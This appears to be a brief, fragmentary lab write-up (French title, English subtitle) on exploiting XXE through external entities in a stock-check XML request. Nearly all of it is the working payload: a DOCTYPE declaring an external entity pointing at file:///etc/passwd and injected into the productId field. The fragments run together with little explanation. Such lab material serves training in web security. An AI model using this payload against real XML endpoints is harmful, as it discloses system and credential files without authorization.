XXE pour lire des fichiers avec des entités externes
Exploiting XXE using external entities to retrieve files




Mis à jour




Mis à jour
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>
2
</productId>
<storeId>
1
</storeId>
</stockCheck><productId>
test
</productId><!DOCTYPE foo [<!ENTITY myFile SYSTEM "file:///etc/passwd">]>&myFile;<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY myFile SYSTEM "file:///etc/passwd">]>
<stockCheck>
<productId>
&myFile;
</productId>
<storeId>
1
</storeId>
</stockCheck>